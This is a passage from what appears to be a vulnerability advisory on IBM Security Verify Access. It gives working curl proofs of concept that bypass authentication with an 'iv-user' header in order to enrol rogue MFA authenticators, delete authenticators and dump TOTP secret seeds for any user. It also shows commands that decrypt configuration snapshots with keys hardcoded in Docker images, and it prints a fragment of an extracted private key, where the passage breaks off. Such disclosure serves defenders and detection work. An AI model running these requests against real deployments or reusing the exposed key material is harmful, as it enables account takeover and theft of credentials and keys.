https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nNote that while the WebSEAL are exposed to the Internet, the runtime instance is located inside the LAN and is not usually exposed to the Internet. The attacker needs to be located inside the LAN to reach the vulnerable APIs. \n\nAccording to the documentation at https://www.ibm.com/docs/en/sva/10.0.7, we can see that the APIs are always reachable using the `/mga/sps/*` path. Actually, the `/mga/` route seems to be managed by WebSEAL servers while the `/sps/*` routes are managed by the runtime docker instance. \n\nWithout authentication, an attacker can reach the IBM Security Verify Runtime Docker image docker instance by reaching, for example, the `/sps/oauth/oauth20/authorize?client_id=ClientID\u0026response_type=code\u0026scope=mmfaAuthn` API endpoint and specifying which target user to compromise using the additional HTTP header `iv-user: target-user`. This specific endpoint is used to enroll a new Multiple-Factor Authenticator (e.g. the official IBM Security Verify app (https://play.google.com/store/apps/details?id=com.ibm.security.verifyapp\u0026hl=en) for the `target-user` user. \n\nBy specifying the HTTP header `iv-user: target-user`, an attacker can interact with all the APIs located in `/sps/*` for any user, without authentication. \n\nListing of authenticators without any cookie or HTTP header - this non-intrusive request allows detecting a vulnerable IBM Security Verify Runtime Docker instance configured to use MFA. \n\n    kali% curl -ks https://test-runtime/sps/mmfa/user/mgmt/authenticators | jq . \n    {\n      \"result\": \"FBTRBA306E The user management operation failed because the user is not authenticated.\"\n    }\n\nListing of authenticators for the `target-user` - with `iv-user` HTTP header (without session cookies nor specific credentials):\n\n    kali% curl -ks https://test-runtime/sps/mmfa/user/mgmt/authenticators -H \"iv-user: target-user\" | jq . \n    [\n      {\n        \"device_name\": \"Iphone 13 Pro Max\",\n        \"oauth_grant\": \"uuida71[REDACTED]\",\n        \"auth_methods\": [],\n        \"os_version\": \"13\",\n        \"device_type\": \"[REDACTED]\",\n        \"id\": \"uuid20[REDACTED]\",\n        \"enabled\": true\n      },\n      {\n        \"device_name\": \"Iphone 13 Pro Max\",\n        \"oauth_grant\": \"uuida71[REDACTED]\",\n        \"auth_methods\": [],\n        \"os_version\": \"13\",\n        \"device_type\": \"[REDACTED]\",\n        \"id\": \"uuid20[REDACTED]\",\n        \"enabled\": true\n      },\n    [...]\n    kali% \n\nIt is possible to enroll any new authenticator for the user target without authentication by reaching the IBM Security Verify Runtime instance and specifying `iv-user: target-user` in the HTTP header:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nA PoC is provided below. The provided secret code allows enrolling a new authenticator for the target user `target-user`. Note that the `client_id` variable must be edited as we use the specific TestAuthenticatorClient client identifier. \nThe valid `client_id` variable can be retrieved from the `/sps/mga/user/mgmt/grant` API:\n\n    kali% curl -kv -H \"iv-user: target-user\" https://test-runtime/sps/mga/user/mgmt/grant | jq . \n    {\n      \"grants\": [\n        {\n          \"id\": \"uuida71[REDACTED]\",\n          \"isEnabled\": true,\n          \"clientId\": \"TestAuthenticatorClient\",\n    [...]\n\nI suggest using the specific `client_id` identifier configured in the targeted instance. The correct `client_id` identifier can also be obtained by visiting `https://test-runtime/sps/mga/user/mgmt/html/device/device_selection.html`. The `device_selection.html` webpage is just a front-end to get access to several APIs:\n\n- - /sps/mga/user/mgmt/grant\n- - /sps/mmfa/user/mgmt/authenticators\n- - /sps/fido2/registrations\n- - /sps/mga/user/mgmt/device \n- - /sps/apiauthsvc/policy/u2f_register\n- - /sps/mga/user/mgmt/clients\n- - ... \n\nFor example, visiting a remote IBM Security Verify Runtime instance at`https://url/sps/mga/user/mgmt/html/device/device_selection.html` without an `iv-user: target-user` HTTP header will return empty information (since the resulting requests sent to APIs are not \"authenticated\"):\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nVisiting the same address `https://url/sps/mga/user/mgmt/html/device/device_selection.html` using Burp Suite Pro, and (i) adding a HTTP Header `iv-user: target-user` in all the resulting HTTP requests and (ii) rewriting the URL from `^\\/mga\\/sps\\/` to `\\/sps\\/` (since the `/mga/` path is hardcoded in JavaScript code) will now provide a full access for the `target-user` (adding an authenticator, deleting an authenticator, adding passkeys, ...). \n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nAn attacker can also add an new authenticator for any user using curl:\n\nPoC:\n\n    kali% curl -kv \"https://test-runtime/sps/oauth/oauth20/authorize?client_id=TestAuthenticatorClient\u0026response_type=code\u0026scope=mmfaAuthn\" -H \"iv-user: target-user\"          \n    * Host test-runtime:443 was resolved. \n    * IPv6: (none)\n    * IPv4: 10.0.0.15\n    *   Trying 10.0.0.15:443... \n    * Connected to test-runtime (10.0.0.15) port 443\n    * using HTTP/1.x\n    \u003e GET /sps/oauth/oauth20/authorize?client_id=TestAuthenticatorClient\u0026response_type=code\u0026scope=mmfaAuthn HTTP/1.1\n    \u003e Host: test-runtime\n    \u003e User-Agent: curl/8.5.0\n    \u003e Accept: */*\n    \u003e iv-user: target-user\n    \u003e \n    \u003c HTTP/1.1 302 Found\n    \u003c X-Frame-Options: SAMEORIGIN\n    \u003c Pragma: no-cache\n    \u003c Location: https://enroll-url/mga/sps/mmfa/user/mgmt/html/mmfa/qr_code.html?client_id=TestAuthenticatorClient\u0026code=0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y\n    \u003c Content-Language: en-US\n    \u003c Transfer-Encoding: chunked\n    \u003c Date: Sat, 07 Sep 2024 12:07:21 GMT\n    \u003c Expires: Thu, 01 Dec 1994 16:00:00 GMT\n    \u003c Cache-Control: no-store, no-cache=set-cookie\n    \u003c \n    * Connection #0 to host test-runtime left intact\n \nThe resulting secret `code` provided in the HTTP answer can be used to enroll an official IBM Security Verify application (https://play.google.com/store/apps/details?id=com.ibm.security.verifyapp\u0026hl=en) corresponding to the `target-user`. \n\nIn order to import this secret token inside an IBM Verify Security application (an authenticator), we can:\n\n- - reach the `https://test-runtime/sps/mmfa/user/mgmt/html/mmfa/qr_code.html?client_id=TestAuthenticatorClient\u0026code=0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y` webpage (without `/mga` at the beginning of the URL) and scan the generated QR code; Burp Suite Pro is required to replace all the API calls from `/mga/sps/` to `/sps/`; or\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\n- - reach the `/sps/mmfa/user/mgmt/qr_code/json` API to get the json encoded data inside the QR code (using `?code=0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y\u0026client_id=TestAuthenticatorClient`) and generate the QR code (note that in the next HTTP answer, the `ignoreSslCerts=true` is not the default option); or\n\n\u003cpre\u003e\nGET /sps/mmfa/user/mgmt/qr_code/json?code=0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y\u0026client_id=TestAuthenticatorClient HTTP/1.1\nHost: test-runtime\niv-user: target-user\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\nConnection: close\n\n\nHTTP/1.1 200 OK\nContent-Type: application/json\nX-Frame-Options: SAMEORIGIN\nPragma: no-cache\nContent-Language: en-US\nConnection: Close\nDate: Sat, 07 Sep 2024 20:39:55 GMT\nExpires: Thu, 01 Dec 1994 16:00:00 GMT\nCache-Control: no-store, no-cache=set-cookie\nContent-Length: 202\n\n{\"code\":\"0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y\",\"options\":\"ignoreSslCerts=true\",\n\"details_url\":\"https:\\/\\/enroll-url\\/mga\\/sps\\/mmfa\\/user\\/mgmt\\/details\",\n\"version\":1,\"client_id\":\"TestAuthenticatorClient\"}\n\u003c/pre\u003e\n\n- - reach the `/mga/sps/mmfa/user/mgmt/qr_code/json` API (provided by any targeted WebSEAL servers from the same infrastructure, including Internet-faced WebSEAL servers) to get the json encoded data inside the QR code (using `?code=0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y\u0026client_id=TestAuthenticatorClient`) and generate the QR code; or\n\n- - simply locally generate the QR code containing the JSON data as shown below using the `qrencode` program:\n\n\u003cpre\u003e\n    kali% qrencode -o picture.png \u0027{\"code\":\"0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y\",\"options\":\"ignoreSslCerts=false\",\"details_url\":\"https:\\/\\/enroll-url\\/mga\\/sps\\/mmfa\\/user\\/mgmt\\/details\",\"version\":1,\"client_id\":\"TestAuthenticatorClient\"}\u0027\n\u003c/pre\u003e\n\nThen the QR code needs to be scanned using the official IBM Verify Security App (https://play.google.com/store/apps/details?id=com.ibm.security.verifyapp\u0026hl=en) in order to enroll a new device. By default, the specific `https://enroll-url/mga/sps/mmfa/user/mgmt/details` is always reachable from the Internet in order to successfully enroll smartphones. \n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nThe official IBM Security Verify application (https://play.google.com/store/apps/details?id=com.ibm.security.verifyapp\u0026hl=en) has been used and successfully enrolled for the `target-user` and can now be used to authenticate as `target-user`:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nThe device has been correctly enrolled from the Internet as shown below, by using the `/sps/mmfa/user/mgmt/authenticators` API without authentication. \n\n    kali% curl -ks https://test-runtime/sps/mmfa/user/mgmt/authenticators -H \"iv-user: target-user\" | jq . \n    [\n      {\n        \"device_name\": \"Samsung S22\",\n        \"oauth_grant\": \"uuida72253ef[REDACTED]\",\n        \"auth_methods\": [\n          {\n            \"key_handle\": \"32e[REDACTED].userPresence\",\n            \"id\": \"uuidb694[REDACTED]\",\n            \"type\": \"user_presence\",\n            \"enabled\": true,\n            \"algorithm\": \"SHA256withRSA\"\n          }\n        ],\n        \"os_version\": \"13\",\n        \"device_type\": \"[REMOVED]\",\n        \"id\": \"uuidb4fde[REDACTED]\",\n        \"enabled\": true\n      },\n    [...]\n\n\nFurthermore, all the APIs in `/sps/*` are directly reachable by specifying the HTTP header `iv-user: target-user`. \n\nWe can also list the secret key for the seed corresponding to OTP:\n\n    kali% curl -ks https://test-runtime/sps/mga/user/mgmt/otp/totp -H \"iv-user: target-user\" | jq .          \n    {                                  \n      \"period\": \"30\",\n      \"secretKeyUrl\": \"otpauth://totp/Example:target-user\"?secret=NSJ[REDACTED][REDACTED][REDACTED]\u0026issuer=Example\",\n      \"secretKey\": \"NSJ[REDACTED][REDACTED][REDACTED]\",\n      \"digits\": \"6\",\n      \"username\": \"target-user\",\n      \"algorithm\": \"HmacSHA1\"\n    }\n\n\nAll the APIs located in `/sps/` are vulnerable to this authentication bypass. \n\nAs shown previously, it is possible to bypass the entire authentication and interact with the IBM Security Verify runtime docker instance as any user. \n\nAn attacker can enroll a device for any user, bypassing the entire access controls, and get control over the infrastructure. Since the back-end is fully reachable, an attacker can also delete any authenticator for any user. \n\nAt the time of the security assessment (October 2022), I was not able to find any official documentation that recommends not exposing the runtime instance to the network, since the runtime APIs are password protected. \n\nThe latest ISVA release (10.0.8) implements an optional authentication based on SSL certificates. It is **strongly recommended** to implement this authentication mechanism and not to expose the ISVA runtime instance to the network. \n\n**Without this optional authentication, any malicous actor (i) with access to WebSEAL servers (with a shell or a SSRF vulnerability) or (ii) with direct network access to the runtime instance, or (iii) with a shell access to any \u0027trusted\u0027 machine (e.g. a monitoring server querying the HTTPS server of ISVA runtime), or (iv) with a low-privilege shell on the docker server running the solution, can completely compromise the authentication infrastructure, without credentials**. \n\nRegarding the official recommendations, IBM recommends (i) not to expose the runtime instance to untrusted clients or (ii) to implement SSL-based certificate authentication and follow the following best practices. IBM provided these references as official responses regarding this issue:\n\n- - From https://www.ibm.com/docs/en/sva/10.0.8?topic=support-docker-image-verify-access-runtime#concept_thc_pnz_w4b__title__1;\n- - And https://www.ibm.com/docs/en/sva/10.0.8?topic=settings-runtime-parameters;\n- - And https://www.ibm.com/docs/en/sva/10.0.8?topic=appliance-tuning-runtime-application-parameters-tracing-specifications:\n\n\u003e Note: If the runtime container is exposed on an external IP address there must be network restrictions in place to ensure that access is not allowed from untrusted clients, or the runtime must be configured to require mutual TLS authentication. \n\n- From my understanding, this vulnerability is not going to be patched (no security bulletin was published and no CVE has been assigned, ticket has been closed as solved) because, according to the official recommendations, it is the customer\u0027s responsability to filter any communication to the runtime instance. This present security advisory will allow offensive and defensive security teams to correctly understand and improve their security posture. \n\nAbout the detection of insecure instances, a HTTPS request to the `/sps/` route providing the banner `Server: IBM Security Verify Access` in the HTTPS answer will allow SOC team to detect an instance. The banner will not appear when reaching `https://test-runtime/`). If MFA is used, a HTTP request to `/sps/mga/user/mgmt/html/device/device_selection.html` (port `443` or `9443`, by default) will allow SOC team to detect an insecure ISVA runtime instance. An answer indicating `200 OK` with the content of the `device_selection.html` webpage will indicate that the tested instance is probably insecure:\n\n    kali% curl -k https://test-runtime/sps/mga/user/mgmt/html/device/device_selection.html\n    [...]\n    \u003c HTTP/1.1 200 OK\n    \u003c X-Frame-Options: SAMEORIGIN\n    \u003c Server: IBM Security Verify Access\n    \u003c Content-Type: text/html;charset=UTF-8\n    [...]\n    \u003c!DOCTYPE html PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\" \"http://www.w3.org/TR/html4/loose.dtd\"\u003e\n    \u003chtml\u003e\n    \n    \u003chead\u003e\n      \u003cmeta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\"\u003e\n      \u003ctitle\u003eDevice Selection\u003c/title\u003e\n      \u003clink type=\"text/css\" rel=\"stylesheet\" href=\"/sps/static/design.css\"\u003e\u003c/link\u003e\n      \u003clink type=\"text/css\" rel=\"stylesheet\" href=\"/sps/mga/user/mgmt/html/device/device_selection.css\"\u003e\u003c/link\u003e\n      \u003cscript type=\"text/javascript\" src=\"/sps/mga/user/mgmt/html/mgmt_msg.js\"\u003e\u003c/script\u003e\n      \u003cscript type=\"text/javascript\" src=\"/sps/static/u2fI18n.js\"\u003e\u003c/script\u003e\n      \u003cscript type=\"text/javascript\" src=\"/sps/mga/user/mgmt/html/common.js\"\u003e\u003c/script\u003e\n      \u003cscript type=\"text/javascript\" src=\"/sps/mga/user/mgmt/html/device/device_selection.js\"\u003e\u003c/script\u003e\n\nOn a side note, from my tests, the APIs are also exposed with authentication from the Internet by visiting `https://enroll-url/mga/sps/mga/user/mgmt/html/device/device_selection.html`. If `device_selection.html` is blocked, it is simply possible to inject the correct answer with Burp Suite Pro (using the `device_selection.html` webpage available in official IBM Docker images) and the previous `/mga/sps/` APIs are still reachable since they are needed to successfully enroll an authenticator from the Internet (e.g. the official IBM Verify Security App running on a smartphone). An attacker that enrolled a rogue authenticator to a compromised account can get persistence access from the Internet even if the runtime instance is not reachable anymore or if the \"regular\" ISVA servers are only reachable from inside the company: the APIs provided by the Internet-faced enrolling server will allow the attackers to enroll new authenticators and retrieve current seeds. \n\nFurthermore, with Internet-faced servers (by design, to enroll authenticators) and an authenticated session, the attack surface is quite big. \n\nIt is also possible to list the target version of a Internet-faced instance (proxifed through WebSEAL) by visiting the `/mga/sps/mmfa/user/mgmt/details` API (when MFA is enabled in ISVA):\n\n    curl -s https://internet-faced-website/mga/sps/mmfa/user/mgmt/details | jq . \n    {\n      \"authntrxn_endpoint\": \"https://info.domain.tld/scim/Me?attributes=urn:ietf:params:scim:schemas:extension:isam:1.0:MMFA:Transaction:transactionsPending,urn:ietf:params:scim:schemas:extension:isam:1.0:MMFA:Transaction:attributesPending\",\n      \"metadata\": {\n        \"service_name\": \"Organisation\",\n        \"qrlogin_endpoint\": \"https://info.domain.tld/mga/sps/authsvc?PolicyId=urn:ibm:security:authentication:asf:qrcode_response\"\n    [...]\n      \"enrollment_endpoint\": \"https://info.domain.tld/scim/Me\",\n    [...]\n      \"version\": \"10.0.8.0\",\n    [...]\n    }\n\n\n\n## Details - Reuse of snapshot private keys\n\nThe official Docker images have been retrieved and analyzed on a local machine:\n\n    kali-docker# docker images\n    REPOSITORY                     TAG        IMAGE ID       CREATED        SIZE\n    ibmcom/verify-access-runtime   10.0.4.0   498e181d7395   3 months ago   1.07GB\n    ibmcom/verify-access-wrp       10.0.4.0   c0003aca743c   3 months ago   442MB\n    ibmcom/verify-access           10.0.4.0   206efdd7809c   3 months ago   1.53GB\n    ibmcom/verify-access-dsc       10.0.4.0   959f6f1095e9   3 months ago   305MB\n    kali-docker# docker save 498e181d7395 \u003e ibmcom/verify-access-runtime.tar\n    kali-docker# docker save c0003aca743c \u003e ibmcom/verify-access-wrp.tar\n    kali-docker# docker save 206efdd7809c \u003e ibmcom/verify-access.tar\n    kali-docker# docker save 959f6f1095e9 \u003e ibmcom/verify-access-dsc.tar\n\nIt was observed that instances contain custom encryption/decryption keys (`device_key.kdb` and `device_key.sth` files) located inside `/var/.ca/`. \n\nThese keys are used by the `isva_decrypt` utility present in all the images. For example, the `/usr/sbin/bootstrap.sh` script will decrypt the stored openldap.zip file using `isva_decrypt`:\n\nContent of `/usr/sbin/bootstrap.sh`:\n\n    [...]\n    # Decrypt and extract the LDAP configuration. \n    isva_decrypt $snapshot_tmp_dir/openldap.zip\n\n    unzip -q -o $snapshot_tmp_dir/openldap.zip -d /\n    [...]\n\nWhen doing an analysis on the official IBM images obtained on Docker Hub, we can confirm the keys (`device_key.kdb` and `device_key.sth`) are in fact hardcoded inside these official IBM images and some of them are also world-readable by default:\n\n    kali-docker# ls -la */*/var/.ca/*            \n    -rw-r--r-- 1 root root 5991 Jun  8 01:29 _verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/var/.ca/device_key.kdb\n    -rw-r--r-- 1 root root  193 Jun  8 01:29 _verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/var/.ca/device_key.sth\n    -rw-r--r-- 1 root root 5991 Jun  8 01:29 _verify-access-runtime.tar/2bf2e32495580fbf5de2abb686d8727c10372a2f7a717ad2608f18362c6c7960/var/.ca/device_key.kdb\n    -rw-r--r-- 1 root root  193 Jun  8 01:29 _verify-access-runtime.tar/2bf2e32495580fbf5de2abb686d8727c10372a2f7a717ad2608f18362c6c7960/var/.ca/device_key.sth\n    -rw------- 1 root root 5991 Jun  8 01:31 _verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/.ca/mesa_ca.kdb\n    -rw------- 1 root root  193 Jun  8 01:31 _verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/.ca/mesa_ca.sth\n    -rw-r--r-- 1 root root 5991 Jun  8 01:29 _verify-access-wrp.tar/b96855ec6855fe34f69782b210ae257d2203ad22d4d79f3bfd4818fa57bcc39a/var/.ca/device_key.kdb\n    -rw-r--r-- 1 root root  193 Jun  8 01:29 _verify-access-wrp.tar/b96855ec6855fe34f69782b210ae257d2203ad22d4d79f3bfd4818fa57bcc39a/var/.ca/device_key.sth\n    \n    kali-docker# sha256sum */*/var/.ca/*|sort|uniq\n    dc47d4cfd4fb21ebaad215b2bca4f7d5c5f32e7c3b6678dc69a570ad534628ce  _verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/var/.ca/device_key.sth\n    dc47d4cfd4fb21ebaad215b2bca4f7d5c5f32e7c3b6678dc69a570ad534628ce  _verify-access-runtime.tar/2bf2e32495580fbf5de2abb686d8727c10372a2f7a717ad2608f18362c6c7960/var/.ca/device_key.sth\n    dc47d4cfd4fb21ebaad215b2bca4f7d5c5f32e7c3b6678dc69a570ad534628ce  _verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/.ca/mesa_ca.sth\n    dc47d4cfd4fb21ebaad215b2bca4f7d5c5f32e7c3b6678dc69a570ad534628ce  _verify-access-wrp.tar/b96855ec6855fe34f69782b210ae257d2203ad22d4d79f3bfd4818fa57bcc39a/var/.ca/device_key.sth\n    f06cd909fd9b4222b4ac228ae71702428505d162255d83cc51e93be5edd8d935  _verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/var/.ca/device_key.kdb\n    f06cd909fd9b4222b4ac228ae71702428505d162255d83cc51e93be5edd8d935  _verify-access-runtime.tar/2bf2e32495580fbf5de2abb686d8727c10372a2f7a717ad2608f18362c6c7960/var/.ca/device_key.kdb\n    f06cd909fd9b4222b4ac228ae71702428505d162255d83cc51e93be5edd8d935  _verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/.ca/mesa_ca.kdb\n    f06cd909fd9b4222b4ac228ae71702428505d162255d83cc51e93be5edd8d935  _verify-access-wrp.tar/b96855ec6855fe34f69782b210ae257d2203ad22d4d79f3bfd4818fa57bcc39a/var/.ca/device_key.kdb\n\nUsing these keys and the `IBM Crypto for C` programs, we can successfully decrypt the `openldap.zip` file - an encrypted zip file - available inside the `default.snapshot` file - this file contains the entire configuration of ISVA and is stored inside Docker instances or retrieved over the network. The `openldap.zip` file contains all the configuration options of the instance and is consequently extremely sensitive (to decrypt it using `isva_decrypt`, it is required to create a `/var/.ca` directory containing `device_key.kdb` and `device_key.sth` in a test machine):\n\n    kali-decryption% LD_LIBRARY_PATH=/home/user/gsk8_64/lib64 strace ./isva_decrypt openldap.zip\n    [...]\n    writev(5, [{iov_base=\"\", iov_len=0}, {iov_base=\"2s\\0\\0etc/openldap/schema/nis.ldif\"..., iov_len=1024}], 2) = 1024\n    writev(5, [{iov_base=\"\", iov_len=0}, {iov_base=\"\\321\\0\\0etc/openldap/schema/collectiv\"..., iov_len=1024}], 2) = 1024\n    writev(5, [{iov_base=\"\", iov_len=0}, {iov_base=\"\\0etc/openldap/slapd-replica.conf\"..., iov_len=1024}], 2) = 1024\n    writev(5, [{iov_base=\"\", iov_len=0}, {iov_base=\"data/secAuthority-default/__db.0\"..., iov_len=1024}], 2) = 1024\n    read(4, \"\\271=b\\223\\205\\320\\277\\365\\207\\302#T\\255\\355\\374Ct\\222\\332M`3%\\341\\361I\\301\\233j\\34\\1\\355\"..., 8191) = 1124\n    writev(5, [{iov_base=\"\", iov_len=0}, {iov_base=\"PK\\1\\2\\36\\3\\24\\0\\0\\0\\10\\0\\4Z-UQ\\202\\212\u003cV\\2\\0\\0\\0 \\0\\0000\\0\\30\\0\"..., iov_len=1024}], 2) = 1024\n    writev(5, [{iov_base=\"\", iov_len=0}, {iov_base=\"+\\0\\30\\0\\0\\0\\0\\0\\0\\0\\0\\0\\200\\201\\256\\213\\7\\0var/openldap/d\"..., iov_len=1024}], 2) = 1024\n    read(4, \"\", 8191)                       = 0\n    close(4)                                = 0\n    write(5, \"\\5\\0\\3\\250\\302\\36cux\\v\\0\\1\\4\\0\\0\\0\\0\\4\\0\\0\\0\\0PK\\5\\6\\0\\0\\0\\0[\\0\"..., 44) = 44\n    close(5)                                = 0\n    unlink(\"openldap.zip\")                  = 0\n    rename(\"/tmp/tmp.pxiQjh\", \"openldap.zip\") = 0\n    unlink(\"/tmp/tmp.pxiQjh\")               = -1 ENOENT (No such file or directory)\n    close(3)                                = 0\n    exit_group(0)                           = ?\n    +++ exited with 0 +++\n    kali-decryption% file openldap.zip \n    openldap.zip: Zip archive data, at least v1.0 to extract, compression method=store\n\nWhile doing an analysis of the zip file, we can find:\n\n- - credentials;\n- - passwords (e.g. in `etc/openldap/dynamic/replica-1.conf` and `etc/openldap/dynamic/passwd.conf`)\n- - RSA keys + certificates (e.g. in `etc/openldap/dynamic/server.key`)\n- - users in the logs. \n\nThe unique kdb files (encrypted archives containing public and private keys) found in the IBM Docker images have also been decrypted (using the corresponding stash files) and analyzed:\n\n    kali-docker# j=0; for file in ./_verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/etc/lum/iss-external.kdb ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/etc/iss-external.kdb ./_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/opt/ibm/ldap/V6.4/etc/ldapkey.kdb ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/trial/trial_ca.kdb ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/isva.signing/isva_signing_public.kdb ./_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/var/.ca/device_key.kdb; do echo $file; LD_LIBRARY_PATH=/home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/local/ibm/gsk8_64/lib64/ /home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/local/ibm/gsk8_64/bin/gsk8capicmd_64 -cert -export -db $file -stashed -target /tmp/tmp.p12 -target_pw password ; openssl pkcs12 -in /tmp/tmp.p12 -out /tmp/export_${j}.pem -nodes -passin pass:password;j=$(($j+1));rm /tmp/tmp.p12;done\n    ./_verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/etc/lum/iss-external.kdb\n    ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/etc/iss-external.kdb\n    ./_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/opt/ibm/ldap/V6.4/etc/ldapkey.kdb\n    ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/trial/trial_ca.kdb\n    ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/isva.signing/isva_signing_public.kdb\n    ./_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/var/.ca/device_key.kdb\n\nThis allows an attacker to extract several private keys:\n\n    Bag Attributes\n        friendlyName: ca\n        localKeyID: 03 82 01 01 00 6F 9B 85 F2 CA 2A DC A3 2E BA F7 D9 36 40 D4 D4 4D 31 A4 AC 23 2E 6E F0 9F 04 90 D7 F5 EC D1 31 7C 39 DB 80 20 7D A2 6C F5 30 F1 B6 C0 8C 1D 9F 32 87 A0 84 FE 22 AC 8F 0E D8 36 03 6D 69 29 E2 57 0C B3 9B 05 C4 E0 1E 81 51 EB 33 49 C3 D3 E1 F2 4E C0 CA 0C 5A A8 F9 5D 54 1F CF BE C0 9A 70 C4 6F 94 65 70 14 9F 1B 74 29 6E EB 00 1F 55 9B FE A1 00 CC FB DC CD 20 35 64 DF D6 A5 A7 F4 FB 76 DB D5 AA 6D 67 08 B1 F8 0B 71 37 AF A2 90 C3 AA 57 38 5B 48 E7 AE 35 6C 0C 8A E3 99 7D 90 94 B0 F8 1E 13 17 F9 A9 2F 5F 87 35 8B F5 6D AC 64 89 28 B0 96 0B 6C FB B4 8E D9 F0 26 AD 61 35 F4 CB A4 59 F8 F6 A0 72 EB 82 CD CF 2D 85 63 CF C3 27 64 9F 52 07 05 D7 19 81 5A 57 4A 92 F5 3F 30 2D 87 BD FB 96 92 2B A0 93 E6 B8 E8 E5 90 27 70 A8 78 6F 1C 98 11 6E F9 70 60 0F 2C D8 4C 44 BF \n    Key Attributes: \u003cNo Attributes\u003e\n    -----BEGIN PRIVATE KEY-----\n    MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQC5d1UkBCpTmK74\n    01RqSKl42SInA0B8zgbLgZG+HPoniIgwzbu4lRJSFGaGjnuJH1ccWPvxuDtv5R26\n    X4EhnL9RewJiHDTq1RRnP/XqQja3uHwsKC4yUlyvhBcX+FcoTKzq4y724ZZs2GIM\n    +Q4d4OsXAomQz3TeEWT9tyr7gCgDJ8W3WvpEUE6mpvm0OPujFivAM9Ws6bY7zcZr\n    qjU4Nct//gq9qlZuKMWan68vE+yMqJAkCCLh6YG8EA+TU/TQP4cCeCIiUBBC6A1R\n    CMbCA9t7AgWTlJPxuPTdgTETLRXDlMJWhWxuTGWtkXrrSXaWIwBTk4XVfeK2xkYs\n    RPNFmBZ1AgMBAAECggEAIt1sA/lEe7KYMe6IT/KY6T7oTK0v0kZowJj67OJFpGjm\n    MUZ7o5diekubenAOiRh7J7kSo74ebkqD7CVIASmWTZryN79Vs0+bJk2/zOnln2Pu\n    894Z0RvqkJQkQz1MJSdE2mMa0Q5XWN7Uj9vB65v8lbbEZZSaQ6TBd3CXg+/zlaPy\n    MvRgK5XvrzCKWD9PtWpIb4nRssJhVDAgfPQf5tlQ05QhKagakxENVB6wmcvOiU2l\n    zYZDTUGFVfgd1OxH7JICaTfBlhncd2OYaHxr+sXrPGuI+Ckz/U5q6UU+/b5EYEPr\n    7BSlmptg6CCFLlJ/Mz3qzcm2Wd9/KWEEbwr7fRLcAQKBgQDIoEC54Fsdj07SHwaM\n    